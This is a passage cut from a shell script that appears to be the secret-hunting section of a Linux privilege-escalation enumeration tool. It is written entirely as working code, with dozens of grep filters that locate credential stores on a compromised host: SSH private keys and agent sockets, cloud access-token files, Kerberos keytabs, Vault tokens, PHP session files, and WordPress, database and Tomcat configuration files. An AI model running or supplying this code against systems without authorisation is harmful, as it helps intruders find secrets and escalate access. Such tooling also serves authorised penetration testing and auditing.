"$FIND_CACHE\n$FIND_HOMESEARCH\n$FIND_SYS\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_TMP\n$FIND_APPLICATIONS\n$FIND_RUN\n$FIND_VAR\n$FIND_SRV\n$FIND_OPT\n$FIND_ETC\n$FIND_SNAP\n$FIND_BIN\n$FIND_SYSTEMD\n$FIND_MNT\n$FIND_PRIVATE\n$FIND_USR\n$FIND_SBIN\n$FIND_CDROM\n$FIND_LIB64\n$FIND_LIB\n$FIND_SYSTEM" | grep -E '/tmp/.*sess_.*|/var/tmp/.*sess_.*' | grep -E "^/private|^/tmp|^/mnt|^/var" | grep -E "sess_.*$" | sort | uniq | head -n 70) - PSTORAGE_PHP_FILES=$(echo -e "$FIND_CACHE\n$FIND_HOMESEARCH\n$FIND_SYS\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_TMP\n$FIND_APPLICATIONS\n$FIND_RUN\n$FIND_VAR\n$FIND_SRV\n$FIND_OPT\n$FIND_ETC\n$FIND_SNAP\n$FIND_BIN\n$FIND_SYSTEMD\n$FIND_MNT\n$FIND_PRIVATE\n$FIND_USR\n$FIND_SBIN\n$FIND_CDROM\n$FIND_LIB64\n$FIND_LIB\n$FIND_SYSTEM" | grep -E "^/tmp|^/sbin|^/usr|^/var|^/bin|^/applications|^/.cache|^/etc|^/srv|^/private|^/snap|^/mnt|^/cdrom|^/media|^/opt|^$GREPHOMESEARCH" | grep -E ".*config.*\.php$|database\.php$|db\.php$|storage\.php$|settings\.php$" | sort | uniq | head -n 70) - PSTORAGE_WORDPRESS=$(echo -e "$FIND_CACHE\n$FIND_HOMESEARCH\n$FIND_SYS\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_TMP\n$FIND_APPLICATIONS\n$FIND_RUN\n$FIND_VAR\n$FIND_SRV\n$FIND_OPT\n$FIND_ETC\n$FIND_SNAP\n$FIND_BIN\n$FIND_SYSTEMD\n$FIND_MNT\n$FIND_PRIVATE\n$FIND_USR\n$FIND_SBIN\n$FIND_CDROM\n$FIND_LIB64\n$FIND_LIB\n$FIND_SYSTEM" | grep -E "^/tmp|^/sbin|^/usr|^/var|^/bin|^/applications|^/.cache|^/etc|^/srv|^/private|^/snap|^/mnt|^/cdrom|^/media|^/opt|^$GREPHOMESEARCH" | grep -E "wp-config\.php$" | sort | uniq | head -n 70) - PSTORAGE_DRUPAL=$(echo -e "$FIND_CACHE\n$FIND_HOMESEARCH\n$FIND_SYS\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_TMP\n$FIND_APPLICATIONS\n$FIND_RUN\n$FIND_VAR\n$FIND_SRV\n$FIND_OPT\n$FIND_ETC\n$FIND_SNAP\n$FIND_BIN\n$FIND_SYSTEMD\n$FIND_MNT\n$FIND_PRIVATE\n$FIND_USR\n$FIND_SBIN\n$FIND_CDROM\n$FIND_LIB64\n$FIND_LIB\n$FIND_SYSTEM" | grep -E '/default/settings.php' | grep -E "^/tmp|^/sbin|^/usr|^/var|^/bin|^/applications|^/.cache|^/etc|^/srv|^/private|^/snap|^/mnt|^/cdrom|^/media|^/opt|^$GREPHOMESEARCH" | grep -E "settings\.php$" | sort | uniq | head -n 70) - PSTORAGE_MOODLE=$(echo -e "$FIND_CACHE\n$FIND_HOMESEARCH\n$FIND_SYS\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_TMP\n$FIND_APPLICATIONS\n$FIND_RUN\n$FIND_VAR\n$FIND_SRV\n$FIND_OPT\n$FIND_ETC\n$FIND_SNAP\n$FIND_BIN\n$FIND_SYSTEMD\n$FIND_MNT\n$FIND_PRIVATE\n$FIND_USR\n$FIND_SBIN\n$FIND_CDROM\n$FIND_LIB64\n$FIND_LIB\n$FIND_SYSTEM" | grep -E 'moodle/config.php' | grep -E "^/tmp|^/sbin|^/usr|^/var|^/bin|^/applications|^/.cache|^/etc|^/srv|^/private|^/snap|^/mnt|^/cdrom|^/media|^/opt|^$GREPHOMESEARCH" | grep -E "config\.php$" | sort | uniq | head -n 70) - PSTORAGE_TOMCAT=$(echo -e "$FIND_CACHE\n$FIND_HOMESEARCH\n$FIND_SYS\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_TMP\n$FIND_APPLICATIONS\n$FIND_RUN\n$FIND_VAR\n$FIND_SRV\n$FIND_OPT\n$FIND_ETC\n$FIND_SNAP\n$FIND_BIN\n$FIND_SYSTEMD\n$FIND_MNT\n$FIND_PRIVATE\n$FIND_USR\n$FIND_SBIN\n$FIND_CDROM\n$FIND_LIB64\n$FIND_LIB\n$FIND_SYSTEM" | grep -E "^/tmp|^/sbin|^/usr|^/var|^/bin|^/applications|^/.cache|^/etc|^/srv|^/private|^/snap|^/mnt|^/cdrom|^/media|^/opt|^$GREPHOMESEARCH" | grep -E "tomcat-users\.xml$" | sort | uniq | head -n 70) - PSTORAGE_MONGO=$(echo -e "$FIND_CACHE\n$FIND_HOMESEARCH\n$FIND_SYS\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_TMP\n$FIND_APPLICATIONS\n$FIND_RUN\n$FIND_VAR\n$FIND_SRV\n$FIND_OPT\n$FIND_ETC\n$FIND_SNAP\n$FIND_BIN\n$FIND_SYSTEMD\n$FIND_MNT\n$FIND_PRIVATE\n$FIND_USR\n$FIND_SBIN\n$FIND_CDROM\n$FIND_LIB64\n$FIND_LIB\n$FIND_SYSTEM" | grep -E "^/tmp|^/sbin|^/usr|^/var|^/bin|^/applications|^/.cache|^/etc|^/srv|^/private|^/snap|^/mnt|^/cdrom|^/media|^/opt|^$GREPHOMESEARCH" | grep -E "mongod.*\.conf$" | sort | uniq | head -n 70) - PSTORAGE_SUPERVISORD=$(echo -e "$FIND_CACHE\n$FIND_HOMESEARCH\n$FIND_SYS\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_TMP\n$FIND_APPLICATIONS\n$FIND_RUN\n$FIND_VAR\n$FIND_SRV\n$FIND_OPT\n$FIND_ETC\n$FIND_SNAP\n$FIND_BIN\n$FIND_SYSTEMD\n$FIND_MNT\n$FIND_PRIVATE\n$FIND_USR\n$FIND_SBIN\n$FIND_CDROM\n$FIND_LIB64\n$FIND_LIB\n$FIND_SYSTEM" | grep -E "^/tmp|^/sbin|^/usr|^/var|^/bin|^/applications|^/.cache|^/etc|^/srv|^/private|^/snap|^/mnt|^/cdrom|^/media|^/opt|^$GREPHOMESEARCH" | grep -E "supervisord\.conf$" | sort | uniq | head -n 70) - PSTORAGE_CESI=$(echo -e "$FIND_CACHE\n$FIND_HOMESEARCH\n$FIND_SYS\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_TMP\n$FIND_APPLICATIONS\n$FIND_RUN\n$FIND_VAR\n$FIND_SRV\n$FIND_OPT\n$FIND_ETC\n$FIND_SNAP\n$FIND_BIN\n$FIND_SYSTEMD\n$FIND_MNT\n$FIND_PRIVATE\n$FIND_USR\n$FIND_SBIN\n$FIND_CDROM\n$FIND_LIB64\n$FIND_LIB\n$FIND_SYSTEM" | grep -E "^/tmp|^/sbin|^/usr|^/var|^/bin|^/applications|^/.cache|^/etc|^/srv|^/private|^/snap|^/mnt|^/cdrom|^/media|^/opt|^$GREPHOMESEARCH" | grep -E "cesi\.conf$" | sort | uniq | head -n 70) - PSTORAGE_RSYNC=$(echo -e "$FIND_CACHE\n$FIND_HOMESEARCH\n$FIND_SYS\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_TMP\n$FIND_APPLICATIONS\n$FIND_RUN\n$FIND_VAR\n$FIND_SRV\n$FIND_OPT\n$FIND_ETC\n$FIND_SNAP\n$FIND_BIN\n$FIND_SYSTEMD\n$FIND_MNT\n$FIND_PRIVATE\n$FIND_USR\n$FIND_SBIN\n$FIND_CDROM\n$FIND_LIB64\n$FIND_LIB\n$FIND_SYSTEM" | grep -E "^/tmp|^/sbin|^/usr|^/var|^/bin|^/applications|^/.cache|^/etc|^/srv|^/private|^/snap|^/mnt|^/cdrom|^/media|^/opt|^$GREPHOMESEARCH" | grep -E "rsyncd\.conf$|rsyncd\.secrets$" | sort | uniq | head -n 70) - PSTORAGE_HOSTAPD=$(echo -e "$FIND_CACHE\n$FIND_HOMESEARCH\n$FIND_SYS\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_TMP\n$FIND_APPLICATIONS\n$FIND_RUN\n$FIND_VAR\n$FIND_SRV\n$FIND_OPT\n$FIND_ETC\n$FIND_SNAP\n$FIND_BIN\n$FIND_SYSTEMD\n$FIND_MNT\n$FIND_PRIVATE\n$FIND_USR\n$FIND_SBIN\n$FIND_CDROM\n$FIND_LIB64\n$FIND_LIB\n$FIND_SYSTEM" | grep -E "^/tmp|^/sbin|^/usr|^/var|^/bin|^/applications|^/.cache|^/etc|^/srv|^/private|^/snap|^/mnt|^/cdrom|^/media|^/opt|^$GREPHOMESEARCH" | grep -E "hostapd\.conf$" | sort | uniq | head -n 70) - PSTORAGE_ANACONDA_KS=$(echo -e "$FIND_CACHE\n$FIND_HOMESEARCH\n$FIND_SYS\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_TMP\n$FIND_APPLICATIONS\n$FIND_RUN\n$FIND_VAR\n$FIND_SRV\n$FIND_OPT\n$FIND_ETC\n$FIND_SNAP\n$FIND_BIN\n$FIND_SYSTEMD\n$FIND_MNT\n$FIND_PRIVATE\n$FIND_USR\n$FIND_SBIN\n$FIND_CDROM\n$FIND_LIB64\n$FIND_LIB\n$FIND_SYSTEM" | grep -E "^/tmp|^/sbin|^/usr|^/var|^/bin|^/applications|^/.cache|^/etc|^/srv|^/private|^/snap|^/mnt|^/cdrom|^/media|^/opt|^$GREPHOMESEARCH" | grep -E "anaconda-ks\.cfg$" | sort | uniq | head -n 70) - PSTORAGE_RACOON=$(echo -e "$FIND_CACHE\n$FIND_HOMESEARCH\n$FIND_SYS\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_TMP\n$FIND_APPLICATIONS\n$FIND_RUN\n$FIND_VAR\n$FIND_SRV\n$FIND_OPT\n$FIND_ETC\n$FIND_SNAP\n$FIND_BIN\n$FIND_SYSTEMD\n$FIND_MNT\n$FIND_PRIVATE\n$FIND_USR\n$FIND_SBIN\n$FIND_CDROM\n$FIND_LIB64\n$FIND_LIB\n$FIND_SYSTEM" | grep -E "^/tmp|^/sbin|^/usr|^/var|^/bin|^/applications|^/.cache|^/etc|^/srv|^/private|^/snap|^/mnt|^/cdrom|^/media|^/opt|^$GREPHOMESEARCH" | grep -E "racoon\.conf$|psk\.txt$" | sort | uniq | head -n 70) - PSTORAGE_VNC=$(echo -e "$FIND_CACHE\n$FIND_HOMESEARCH\n$FIND_SYS\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_TMP\n$FIND_APPLICATIONS\n$FIND_RUN\n$FIND_VAR\n$FIND_SRV\n$FIND_OPT\n$FIND_ETC\n$FIND_SNAP\n$FIND_BIN\n$FIND_SYSTEMD\n$FIND_MNT\n$FIND_PRIVATE\n$FIND_USR\n$FIND_SBIN\n$FIND_CDROM\n$FIND_LIB64\n$FIND_LIB\n$FIND_SYSTEM\n$FIND_DIR_MEDIA\n$FIND_DIR_CDROM\n$FIND_DIR_HOMESEARCH\n$FIND_DIR_ETC\n$FIND_DIR_MNT\n$FIND_DIR_PRIVATE\n$FIND_DIR_APPLICATIONS\n$FIND_DIR_TMP\n$FIND_DIR_VAR\n$FIND_DIR_CACHE\n$FIND_DIR_USR\n$FIND_DIR_BIN\n$FIND_DIR_SBIN\n$FIND_DIR_SNAP\n$FIND_DIR_OPT\n$FIND_DIR_SRV" | grep -E "^/tmp|^/sbin|^/usr|^/var|^/bin|^/applications|^/.cache|^/etc|^/srv|^/private|^/snap|^/mnt|^/cdrom|^/media|^/opt|^$GREPHOMESEARCH" | grep -E "\.vnc$|.*vnc.*\.c.*nf.*$|.*vnc.*\.ini$|.*vnc.*\.txt$|.*vnc.*\.xml$" | sort | uniq | head -n 70) - PSTORAGE_LDAP=$(echo -e "$FIND_DIR_MEDIA\n$FIND_DIR_CDROM\n$FIND_DIR_HOMESEARCH\n$FIND_DIR_ETC\n$FIND_DIR_MNT\n$FIND_DIR_PRIVATE\n$FIND_DIR_APPLICATIONS\n$FIND_DIR_TMP\n$FIND_DIR_VAR\n$FIND_DIR_CACHE\n$FIND_DIR_USR\n$FIND_DIR_BIN\n$FIND_DIR_SBIN\n$FIND_DIR_SNAP\n$FIND_DIR_OPT\n$FIND_DIR_SRV" | grep -E "^/tmp|^/sbin|^/usr|^/var|^/bin|^/applications|^/.cache|^/etc|^/srv|^/private|^/snap|^/mnt|^/cdrom|^/media|^/opt|^$GREPHOMESEARCH" | grep -E "ldap$" | sort | uniq | head -n 70) - PSTORAGE_OPENVPN=$(echo -e "$FIND_CACHE\n$FIND_HOMESEARCH\n$FIND_SYS\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_TMP\n$FIND_APPLICATIONS\n$FIND_RUN\n$FIND_VAR\n$FIND_SRV\n$FIND_OPT\n$FIND_ETC\n$FIND_SNAP\n$FIND_BIN\n$FIND_SYSTEMD\n$FIND_MNT\n$FIND_PRIVATE\n$FIND_USR\n$FIND_SBIN\n$FIND_CDROM\n$FIND_LIB64\n$FIND_LIB\n$FIND_SYSTEM" | grep -E "^/tmp|^/sbin|^/usr|^/var|^/bin|^/applications|^/.cache|^/etc|^/srv|^/private|^/snap|^/mnt|^/cdrom|^/media|^/opt|^$GREPHOMESEARCH" | grep -E ".*\.ovpn$" | sort | uniq | head -n 70) - PSTORAGE_SSH=$(echo -e "$FIND_CACHE\n$FIND_HOMESEARCH\n$FIND_SYS\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_TMP\n$FIND_APPLICATIONS\n$FIND_RUN\n$FIND_VAR\n$FIND_SRV\n$FIND_OPT\n$FIND_ETC\n$FIND_SNAP\n$FIND_BIN\n$FIND_SYSTEMD\n$FIND_MNT\n$FIND_PRIVATE\n$FIND_USR\n$FIND_SBIN\n$FIND_CDROM\n$FIND_LIB64\n$FIND_LIB\n$FIND_SYSTEM" | grep -E "^/tmp|^/sbin|^/usr|^/var|^/bin|^/applications|^/.cache|^/etc|^/srv|^/private|^/snap|^/mnt|^/cdrom|^/media|^/opt|^$GREPHOMESEARCH" | grep -E "id_dsa.*$|id_rsa.*$|known_hosts$|authorized_hosts$|authorized_keys$" | sort | uniq | head -n 70) - PSTORAGE_CERTSB4=$(echo -e "$FIND_CACHE\n$FIND_HOMESEARCH\n$FIND_SYS\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_TMP\n$FIND_APPLICATIONS\n$FIND_RUN\n$FIND_VAR\n$FIND_SRV\n$FIND_OPT\n$FIND_ETC\n$FIND_SNAP\n$FIND_BIN\n$FIND_SYSTEMD\n$FIND_MNT\n$FIND_PRIVATE\n$FIND_USR\n$FIND_SBIN\n$FIND_CDROM\n$FIND_LIB64\n$FIND_LIB\n$FIND_SYSTEM" | grep -v -E '^/usr/share/|^/etc/ssl/|^/usr/local/lib/|^/usr/lib.*' | grep -E "^/tmp|^/sbin|^/usr|^/var|^/bin|^/applications|^/.cache|^/etc|^/srv|^/private|^/snap|^/mnt|^/cdrom|^/media|^/opt|^$GREPHOMESEARCH" | grep -E ".*\.pem$|.*\.cer$|.*\.crt$" | sort | uniq | head -n 70) - PSTORAGE_CERTSBIN=$(echo -e "$FIND_CACHE\n$FIND_HOMESEARCH\n$FIND_SYS\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_TMP\n$FIND_APPLICATIONS\n$FIND_RUN\n$FIND_VAR\n$FIND_SRV\n$FIND_OPT\n$FIND_ETC\n$FIND_SNAP\n$FIND_BIN\n$FIND_SYSTEMD\n$FIND_MNT\n$FIND_PRIVATE\n$FIND_USR\n$FIND_SBIN\n$FIND_CDROM\n$FIND_LIB64\n$FIND_LIB\n$FIND_SYSTEM" | grep -v -E '^/usr/share/|^/etc/ssl/|^/usr/local/lib/|^/usr/lib/.*' | grep -E "^/tmp|^/sbin|^/usr|^/var|^/bin|^/applications|^/.cache|^/etc|^/srv|^/private|^/snap|^/mnt|^/cdrom|^/media|^/opt|^$GREPHOMESEARCH" | grep -E ".*\.csr$|.*\.der$" | sort | uniq | head -n 70) - PSTORAGE_CERTSCLIENT=$(echo -e "$FIND_CACHE\n$FIND_HOMESEARCH\n$FIND_SYS\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_TMP\n$FIND_APPLICATIONS\n$FIND_RUN\n$FIND_VAR\n$FIND_SRV\n$FIND_OPT\n$FIND_ETC\n$FIND_SNAP\n$FIND_BIN\n$FIND_SYSTEMD\n$FIND_MNT\n$FIND_PRIVATE\n$FIND_USR\n$FIND_SBIN\n$FIND_CDROM\n$FIND_LIB64\n$FIND_LIB\n$FIND_SYSTEM" | grep -v -E '^/usr/share/|^/etc/ssl/|^/usr/local/lib/|^/usr/lib/.*' | grep -E "^/tmp|^/sbin|^/usr|^/var|^/bin|^/applications|^/.cache|^/etc|^/srv|^/private|^/snap|^/mnt|^/cdrom|^/media|^/opt|^$GREPHOMESEARCH" | grep -E ".*\.pfx$|.*\.p12$" | sort | uniq | head -n 70) - PSTORAGE_SSH_AGENTS=$(echo -e "$FIND_CACHE\n$FIND_HOMESEARCH\n$FIND_SYS\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_TMP\n$FIND_APPLICATIONS\n$FIND_RUN\n$FIND_VAR\n$FIND_SRV\n$FIND_OPT\n$FIND_ETC\n$FIND_SNAP\n$FIND_BIN\n$FIND_SYSTEMD\n$FIND_MNT\n$FIND_PRIVATE\n$FIND_USR\n$FIND_SBIN\n$FIND_CDROM\n$FIND_LIB64\n$FIND_LIB\n$FIND_SYSTEM" | grep -E "^/private|^/tmp" | grep -E "agent.*$" | sort | uniq | head -n 70) - PSTORAGE_SSH_CONFIG=$(echo -e "$FIND_CACHE\n$FIND_HOMESEARCH\n$FIND_SYS\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_TMP\n$FIND_APPLICATIONS\n$FIND_RUN\n$FIND_VAR\n$FIND_SRV\n$FIND_OPT\n$FIND_ETC\n$FIND_SNAP\n$FIND_BIN\n$FIND_SYSTEMD\n$FIND_MNT\n$FIND_PRIVATE\n$FIND_USR\n$FIND_SBIN\n$FIND_CDROM\n$FIND_LIB64\n$FIND_LIB\n$FIND_SYSTEM" | grep -E "^/usr|^$GREPHOMESEARCH" | grep -E "ssh.*config$" | sort | uniq | head -n 70) - PSTORAGE_CLOUD_CREDENTIALS=$(echo -e "$FIND_CACHE\n$FIND_HOMESEARCH\n$FIND_SYS\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_TMP\n$FIND_APPLICATIONS\n$FIND_RUN\n$FIND_VAR\n$FIND_SRV\n$FIND_OPT\n$FIND_ETC\n$FIND_SNAP\n$FIND_BIN\n$FIND_SYSTEMD\n$FIND_MNT\n$FIND_PRIVATE\n$FIND_USR\n$FIND_SBIN\n$FIND_CDROM\n$FIND_LIB64\n$FIND_LIB\n$FIND_SYSTEM\n$FIND_DIR_MEDIA\n$FIND_DIR_CDROM\n$FIND_DIR_HOMESEARCH\n$FIND_DIR_ETC\n$FIND_DIR_MNT\n$FIND_DIR_PRIVATE\n$FIND_DIR_APPLICATIONS\n$FIND_DIR_TMP\n$FIND_DIR_VAR\n$FIND_DIR_CACHE\n$FIND_DIR_USR\n$FIND_DIR_BIN\n$FIND_DIR_SBIN\n$FIND_DIR_SNAP\n$FIND_DIR_OPT\n$FIND_DIR_SRV" | grep -E "^/tmp|^/sbin|^/usr|^/var|^/bin|^/applications|^/.cache|^/etc|^/srv|^/private|^/snap|^/mnt|^/cdrom|^/media|^/opt|^$GREPHOMESEARCH" | grep -E "credentials$|credentials\.db$|legacy_credentials\.db$|access_tokens\.db$|access_tokens\.json$|accessTokens\.json$|azureProfile\.json$|TokenCache\.dat$|AzureRMContext\.json$|\.bluemix$" | sort | uniq | head -n 70) - PSTORAGE_KERBEROS=$(echo -e "$FIND_CACHE\n$FIND_HOMESEARCH\n$FIND_SYS\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_TMP\n$FIND_APPLICATIONS\n$FIND_RUN\n$FIND_VAR\n$FIND_SRV\n$FIND_OPT\n$FIND_ETC\n$FIND_SNAP\n$FIND_BIN\n$FIND_SYSTEMD\n$FIND_MNT\n$FIND_PRIVATE\n$FIND_USR\n$FIND_SBIN\n$FIND_CDROM\n$FIND_LIB64\n$FIND_LIB\n$FIND_SYSTEM" | grep -E "^/tmp|^/sbin|^/usr|^/var|^/bin|^/applications|^/.cache|^/etc|^/srv|^/private|^/snap|^/mnt|^/cdrom|^/media|^/opt|^$GREPHOMESEARCH" | grep -E "krb5\.conf$|krb5\.keytab$|\.k5login$|kadm5\.acl$|secrets\.ldb$|\.secrets\.mkey$|sssd\.conf$" | sort | uniq | head -n 70) - PSTORAGE_KIBANA=$(echo -e "$FIND_CACHE\n$FIND_HOMESEARCH\n$FIND_SYS\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_TMP\n$FIND_APPLICATIONS\n$FIND_RUN\n$FIND_VAR\n$FIND_SRV\n$FIND_OPT\n$FIND_ETC\n$FIND_SNAP\n$FIND_BIN\n$FIND_SYSTEMD\n$FIND_MNT\n$FIND_PRIVATE\n$FIND_USR\n$FIND_SBIN\n$FIND_CDROM\n$FIND_LIB64\n$FIND_LIB\n$FIND_SYSTEM" | grep -E "^/tmp|^/sbin|^/usr|^/var|^/bin|^/applications|^/.cache|^/etc|^/srv|^/private|^/snap|^/mnt|^/cdrom|^/media|^/opt|^$GREPHOMESEARCH" | grep -E "kibana\.y.*ml$" | sort | uniq | head -n 70) - PSTORAGE_KNOCKD=$(echo -e "$FIND_CACHE\n$FIND_HOMESEARCH\n$FIND_SYS\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_TMP\n$FIND_APPLICATIONS\n$FIND_RUN\n$FIND_VAR\n$FIND_SRV\n$FIND_OPT\n$FIND_ETC\n$FIND_SNAP\n$FIND_BIN\n$FIND_SYSTEMD\n$FIND_MNT\n$FIND_PRIVATE\n$FIND_USR\n$FIND_SBIN\n$FIND_CDROM\n$FIND_LIB64\n$FIND_LIB\n$FIND_SYSTEM" | grep -E '/etc/init.d/' | grep -E "^/etc" | grep -E ".*knockd.*$" | sort | uniq | head -n 70) - PSTORAGE_LOGSTASH=$(echo -e "$FIND_DIR_MEDIA\n$FIND_DIR_CDROM\n$FIND_DIR_HOMESEARCH\n$FIND_DIR_ETC\n$FIND_DIR_MNT\n$FIND_DIR_PRIVATE\n$FIND_DIR_APPLICATIONS\n$FIND_DIR_TMP\n$FIND_DIR_VAR\n$FIND_DIR_CACHE\n$FIND_DIR_USR\n$FIND_DIR_BIN\n$FIND_DIR_SBIN\n$FIND_DIR_SNAP\n$FIND_DIR_OPT\n$FIND_DIR_SRV" | grep -E "^/tmp|^/sbin|^/usr|^/var|^/bin|^/applications|^/.cache|^/etc|^/srv|^/private|^/snap|^/mnt|^/cdrom|^/media|^/opt|^$GREPHOMESEARCH" | grep -E "logstash$" | sort | uniq | head -n 70) - PSTORAGE_ELASTICSEARCH=$(echo -e "$FIND_CACHE\n$FIND_HOMESEARCH\n$FIND_SYS\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_TMP\n$FIND_APPLICATIONS\n$FIND_RUN\n$FIND_VAR\n$FIND_SRV\n$FIND_OPT\n$FIND_ETC\n$FIND_SNAP\n$FIND_BIN\n$FIND_SYSTEMD\n$FIND_MNT\n$FIND_PRIVATE\n$FIND_USR\n$FIND_SBIN\n$FIND_CDROM\n$FIND_LIB64\n$FIND_LIB\n$FIND_SYSTEM" | grep -E "^/tmp|^/sbin|^/usr|^/var|^/bin|^/applications|^/.cache|^/etc|^/srv|^/private|^/snap|^/mnt|^/cdrom|^/media|^/opt|^$GREPHOMESEARCH" | grep -E "elasticsearch\.y.*ml$" | sort | uniq | head -n 70) - PSTORAGE_VAULT_SSH_HELPER=$(echo -e "$FIND_CACHE\n$FIND_HOMESEARCH\n$FIND_SYS\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_TMP\n$FIND_APPLICATIONS\n$FIND_RUN\n$FIND_VAR\n$FIND_SRV\n$FIND_OPT\n$FIND_ETC\n$FIND_SNAP\n$FIND_BIN\n$FIND_SYSTEMD\n$FIND_MNT\n$FIND_PRIVATE\n$FIND_USR\n$FIND_SBIN\n$FIND_CDROM\n$FIND_LIB64\n$FIND_LIB\n$FIND_SYSTEM" | grep -E "^/tmp|^/sbin|^/usr|^/var|^/bin|^/applications|^/.cache|^/etc|^/srv|^/private|^/snap|^/mnt|^/cdrom|^/media|^/opt|^$GREPHOMESEARCH" | grep -E "vault-ssh-helper\.hcl$" | sort | uniq | head -n 70) - PSTORAGE_VAULT_SSH_TOKEN=$(echo -e "$FIND_CACHE\n$FIND_HOMESEARCH\n$FIND_SYS\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_TMP\n$FIND_APPLICATIONS\n$FIND_RUN\n$FIND_VAR\n$FIND_SRV\n$FIND_OPT\n$FIND_ETC\n$FIND_SNAP\n$FIND_BIN\n$FIND_SYSTEMD\n$FIND_MNT\n$FIND_PRIVATE\n$FIND_USR\n$FIND_SBIN\n$FIND_CDROM\n$FIND_LIB64\n$FIND_LIB\n$FIND_SYSTEM" | grep -E "^/tmp|^/sbin|^/usr|^/var|^/bin|^/applications|^/.cache|^/etc|^/srv|^/private|^/snap|^/mnt|^/cdrom|^/media|^/opt|^$GREPHOMESEARCH" | grep -E "\.vault-token$" | sort | uniq | head -n 70) - PSTORAGE_COUCHDB=$(echo -e "$FIND_DIR_MEDIA\n$FIND_DIR_CDROM\n$FIND_DIR_HOMESEARCH\n$FIND_DIR_ETC\n$FIND_DIR_MNT\n$FIND_DIR_PRIVATE\n$FIND_DIR_APPLICATIONS\n$FIND_DIR_TMP\n$FIND_DIR_VAR\n$FIND_DIR_CACHE\n$FIND_DIR_USR\n$FIND_DIR_BIN\n$FIND_DIR_SBIN\n$FIND_DIR_SNAP\n$FIND_DIR_OPT\n$FIND_DIR_SRV" | grep -E "^/tmp|^/sbin|^/usr|^/var|^/bin|^/applications|^/.cache|^/etc|^/srv|^/private|^/snap|^/mnt|^/cdrom|^/media|^/opt|^$GREPHOMESEARCH" | grep -E "couchdb$" | sort | uniq | head -n 70) - PSTORAGE_REDIS=$(echo -e "$FIND_CACHE\n$FIND_HOMESEARCH\n$FIND_SYS\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_TMP\n$FIND_APPLICATIONS\n$FIND_RUN\n$FIND_VAR\n$FIND_SRV\n$FIND_OPT\n$FIND_ETC\n$FIND_SNAP\n$FIND_BIN\n$FIND_SYSTEMD\n$FIND_MNT\n$FIND_PRIVATE\n$FIND_USR\n$FIND_SBIN\n$FIND_CDROM\n$FIND_LIB64\n$FIND_LIB\n$FIND_SYSTEM" | grep -E "^/tmp|^/sbin|^/usr|^/var|^/bin|^/applications|^/.cache|^/etc|^/srv|^/private|^/snap|^/mnt|^/cdrom|^/media|^/opt|^$GREPHOMESEARCH" | grep -E "redis\.conf$" | sort | uniq | head -n 70) - PSTORAGE_MOSQUITTO=$(echo -e "$FIND_CACHE\n$FIND_HOMESEARCH\n$FIND_SYS\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_TMP\n$FIND_APPLICATIONS\n$FIND_RUN\n$FIND_VAR\n$FIND_SRV\n$FIND_OPT\n$FIND_ETC\n$FIND_SNAP\n$FIND_BIN\n$FIND_SYSTEMD\n$FIND_MNT\n$FIND_PRIVATE\n$FIND_USR\n$FIND_SBIN\n$FIND_CDROM\n$FIND_LIB64\n$FIND_LIB\n$FIND_SYSTEM" | grep -E "^/tmp|^/sbin|^/usr|^/var|^/bin|^/applications|^/.cache|^/etc|^/srv|^/private|^/snap|^/mnt|^/cdrom|^/media|^/opt|^$GREPHOMESEARCH" | grep -E "mosquitto\.conf$" | sort | uniq | head -n 70) - PSTORAGE_NEO4J=$(echo -e "$FIND_DIR_MEDIA\n$FIND_DIR_CDROM\n$FIND_DIR_HOMESEARCH\n$FIND_DIR_ETC\n$FIND_DIR_MNT\n$FIND_DIR_PRIVATE\n$FIND_DIR_APPLICATIONS\n$FIND_DIR_TMP\n$FIND_DIR_VAR\n$FIND_DIR_CACHE\n$FIND_DIR_USR\n$FIND_DIR_BIN\n$FIND_DIR_SBIN\n$FIND_DIR_SNAP\n$FIND_DIR_OPT\n$FIND_DIR_SRV" | grep -E "^/tmp|^/sbin|^/usr|^/var|^/bin|^/applications|^/.cache|^/etc|^/srv|^/private|^/snap|^/mnt|^/cdrom|^/media|^/opt|^$GREPHOMESEARCH" | grep -E "neo4j$" | sort | uniq | head -n 70) - PSTORAGE_CLOUD_INIT=$(echo -e "$FIND_CACHE\n$FIND_HOMESEARCH\n$FIND_SYS\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_TMP\n$FIND_APPLICATIONS\n$FIND_RUN\n$FIND_VAR\n$FIND_SRV\n$FIND_OPT\n$FIND_ETC\n$FIND_SNAP\n$FIND_BIN\n$FIND_SYSTEMD\n$FIND_MNT\n$FIND_PRIVATE\n$FIND_USR\n$FIND_SBIN\n$FIND_CDROM\n$FIND_LIB64\n$FIND_LIB\n$FIND_SYSTEM" | grep -E "^/tmp|^/sbin|^/usr|^/var|^/bin|^/applications|^/.cache|^/etc|^/srv|^/private|^/snap|^/mnt|^/cdrom|^/media|^/opt|^$GREPHOMESEARCH" | grep -E "cloud\.cfg$" | sort | uniq | head -n 70) - PSTORAGE_ERLANG=$(echo -e 